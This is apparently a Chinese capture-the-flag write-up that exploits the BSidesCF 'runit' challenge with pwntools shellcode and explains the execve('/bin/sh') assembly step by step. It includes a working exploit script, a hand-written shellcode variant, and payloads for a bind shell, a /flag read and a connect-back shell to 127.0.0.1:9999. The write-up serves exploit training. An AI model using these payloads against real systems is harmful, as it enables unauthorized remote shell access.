pwn-shellcode执行

2024-08-23 20:28
文章标签 执行 pwn shellcode

本文主要是介绍pwn-shellcode执行,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言:

这应该是pwn中最简单的,就是利用pwntools生成shellcode,远程执行获取shell,这里以BSidesCF_Runit为例:

分析:

拿到runit后首先看下其安全属性和对应的版本,使用checksec

可以看到,什么安全防护都没有设置,那直接反编译看一眼

 

这太简单了,就是使用mmap申请一块内存后,将获取到的内容进行写入我们申请的内存中,判断内容不为空直接就执行了,那我们只需要发送一段shellcode即可

from pwn import *context.arch = 'i386'p = remote('127.0.0.1', 10001)payload = asm(shellcraft.sh(), os = 'linux')p.sendlineafter(b'stuff!!\n', payload)#sleep(2)
#p.send(payload) p.interactive()

代码也很简单,就是利用 asm(shellcraft.sh(), os = 'linux')生成一段linux下获取shell的shellcode

其中可以选择使用sendlineafter方法,当发现stuff字符串发送payload内容,或者sleep几秒钟直接发送数据,最后利用interactive进行交互操作

在pwntools文件中可以看到其代码,位置如下:

pwnlib\shellcraft\templates\arm\linux

可以看到其除了sh以外还有其他的shellcode命令

shellcode分析:

深究一下,看看其具体的shellcode代码

 

 使用readelf可以看到是小断存储32位

由此可以知道 2F 62 69 6E 2F 2F 2F 73 68是/bin///sh 此处就是为了压入字符串,即push b'/bin///sh\x00

mov ebx, esp: 将栈顶指针存储在 ebx 寄存器中,作为 execve() 的第一个参数 path。

然后利用如下将 'sh\x00' 字符串压入栈中。

push 0x1010101、xor dword ptr [esp], 0x1016972:

xor ecx, ecx、push ecx: 压入 null 终止符。
push 4、pop ecx、add ecx, esp: 计算参数数组的地址,存储在 ecx 寄存器中,作为 execve() 的第二个参数 argv。

最后就是第三个参数

xor edx, edx: 将 edx 寄存器清零,作为 execve() 的第三个参数 envp。

最后执行 execve() 系统调用:
push SYS_execve、pop eax: 将系统调用号 SYS_execve (值为 0xb) 存入 eax 寄存器。
int 0x80: 触发 int 0x80 系统调用中断,执行 execve() 系统调用。

本质上我们就是希望执行execve(path='/bin///sh', argv=['sh'], envp=0)

其中 ebx,ecx和edx分别为其三个参数

为什么这样做,是因为Linux 32位系统上使用 IA-32 ABI 调用约定。其参数传递: 前 3 个参数分别存放在 ebx、ecx、edx 寄存器中。第 4 个及之后的参数需要压入栈中。返回值: 存放在 eax 寄存器中。

所以linux制作shellcode方法归纳下为:

1.我们首先需要确定要调用的方法即为具体的调用链

2.将所需要参数从左到右依次存放如ebx,ecx ,edx中

3.然后将需要调用的方法地址存入eax中

4.采用int 0x80触发系统断点自动调用eax的内容进而进入指定函数中

5.函数返回的结果存储在eax中,如果存在多个调用需要注意

作为练习,我们可以换个简单点的执行,例如

execve(path='/bin///sh', 0, 0)

对应编写汇编代码:

xor eax, eax
push eax        ; string terminator
push 0x68732f6e ; "hs/n"
push 0x69622f2f ; "ib//"
mov ebx, esp    ; "//bin/sh",0 pointer is ESP
xor ecx, ecx    ; ECX = 0
xor edx, edx    ; EDX = 0
mov al, 0xb     ; execve()
int 0x80

ebx为路径,ecx和edx分别为0,通过系统中断调用eax的值,进入执行 execve方法

测试如下

同样可以成功执行 

实测:

首先我们使用如下命令将输出输入转发到指定端口

socat tcp-listen:10001,reuseaddr,fork EXEC:./runit,pty,raw,echo=0

这样就转发到了本地的10001端口,然后就可以执行我们编号的python程序,可以成功的拿下shell

 

抓包看下流量

 

绕过:

如果execve被禁止了怎么半,我们除了利用上述进行手工编写shellcode,也可以使用如下payload

shellcode = asm(pwnlib.shellcraft.amd64.linux.bindsh(9999, 'ipv4')) # 绑定shell到999端口
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat("/flag", 1)) # 读取/flag,输出到标准输出
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat2("/flag", 1, 0x30)) # 读取/flag,输出到标准输出
shellcode = asm(pwnlib.shellcraft.amd64.linux.socket("ipv4", "tcp")+\pwnlib.shellcraft.amd64.linux.connect("127.0.0.1", 9999, 'ipv4')+\pwnlib.shellcraft.amd64.linux.dupsh('rax')) 

结尾:

以上为32位的程序具体的分析过程,包含了shellcode的编写和执行,64位大同小异, 执行shellcode主要需要注意对应系统的调用约定和传参约定

这篇关于pwn-shellcode执行的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1100416

相关文章

C++统计函数执行时间的最佳实践

《C++统计函数执行时间的最佳实践》在软件开发过程中,性能分析是优化程序的重要环节,了解函数的执行时间分布对于识别性能瓶颈至关重要,本文将分享一个C++函数执行时间统计工具,希望对大家有所帮助... 目录前言工具特性核心设计1. 数据结构设计2. 单例模式管理器3. RAII自动计时使用方法基本用法高级用法

Java实现远程执行Shell指令

《Java实现远程执行Shell指令》文章介绍使用JSch在SpringBoot项目中实现远程Shell操作,涵盖环境配置、依赖引入及工具类编写,详解分号和双与号执行多指令的区别... 目录软硬件环境说明编写执行Shell指令的工具类总结jsch(Java Secure Channel)是SSH2的一个纯J

python 线程池顺序执行的方法实现

《python线程池顺序执行的方法实现》在Python中,线程池默认是并发执行任务的,但若需要实现任务的顺序执行,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋... 目录方案一:强制单线程(伪顺序执行)方案二:按提交顺序获取结果方案三:任务间依赖控制方案四:队列顺序消

Go语言连接MySQL数据库执行基本的增删改查

《Go语言连接MySQL数据库执行基本的增删改查》在后端开发中,MySQL是最常用的关系型数据库之一,本文主要为大家详细介绍了如何使用Go连接MySQL数据库并执行基本的增删改查吧... 目录Go语言连接mysql数据库准备工作安装 MySQL 驱动代码实现运行结果注意事项Go语言执行基本的增删改查准备工作

解密SQL查询语句执行的过程

《解密SQL查询语句执行的过程》文章讲解了SQL语句的执行流程,涵盖解析、优化、执行三个核心阶段,并介绍执行计划查看方法EXPLAIN,同时提出性能优化技巧如合理使用索引、避免SELECT*、JOIN... 目录1. SQL语句的基本结构2. SQL语句的执行过程3. SQL语句的执行计划4. 常见的性能优

Spring Bean初始化及@PostConstruc执行顺序示例详解

《SpringBean初始化及@PostConstruc执行顺序示例详解》本文给大家介绍SpringBean初始化及@PostConstruc执行顺序,本文通过实例代码给大家介绍的非常详细,对大家的... 目录1. Bean初始化执行顺序2. 成员变量初始化顺序2.1 普通Java类(非Spring环境)(

Spring Boot 中的默认异常处理机制及执行流程

《SpringBoot中的默认异常处理机制及执行流程》SpringBoot内置BasicErrorController,自动处理异常并生成HTML/JSON响应,支持自定义错误路径、配置及扩展,如... 目录Spring Boot 异常处理机制详解默认错误页面功能自动异常转换机制错误属性配置选项默认错误处理

如何在Java Spring实现异步执行(详细篇)

《如何在JavaSpring实现异步执行(详细篇)》Spring框架通过@Async、Executor等实现异步执行,提升系统性能与响应速度,支持自定义线程池管理并发,本文给大家介绍如何在Sprin... 目录前言1. 使用 @Async 实现异步执行1.1 启用异步执行支持1.2 创建异步方法1.3 调用

Spring Boot Maven 插件如何构建可执行 JAR 的核心配置

《SpringBootMaven插件如何构建可执行JAR的核心配置》SpringBoot核心Maven插件,用于生成可执行JAR/WAR,内置服务器简化部署,支持热部署、多环境配置及依赖管理... 目录前言一、插件的核心功能与目标1.1 插件的定位1.2 插件的 Goals(目标)1.3 插件定位1.4 核

mybatis执行insert返回id实现详解

《mybatis执行insert返回id实现详解》MyBatis插入操作默认返回受影响行数,需通过useGeneratedKeys+keyProperty或selectKey获取主键ID,确保主键为自... 目录 两种方式获取自增 ID:1. ​​useGeneratedKeys+keyProperty(推